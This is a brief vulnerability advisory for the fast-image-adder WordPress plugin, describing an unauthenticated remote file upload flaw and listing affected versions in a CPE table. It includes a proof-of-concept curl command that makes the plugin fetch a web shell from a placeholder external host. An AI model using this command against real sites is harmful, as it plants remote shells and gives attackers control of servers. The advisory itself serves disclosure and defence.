The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability.
$ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url;=http://sitewithshellstodl/shell.php Shell location is reported back to the user with random filename.
CPE | Name | Operator | Version |
---|---|---|---|
fast-image-adder | eq | * |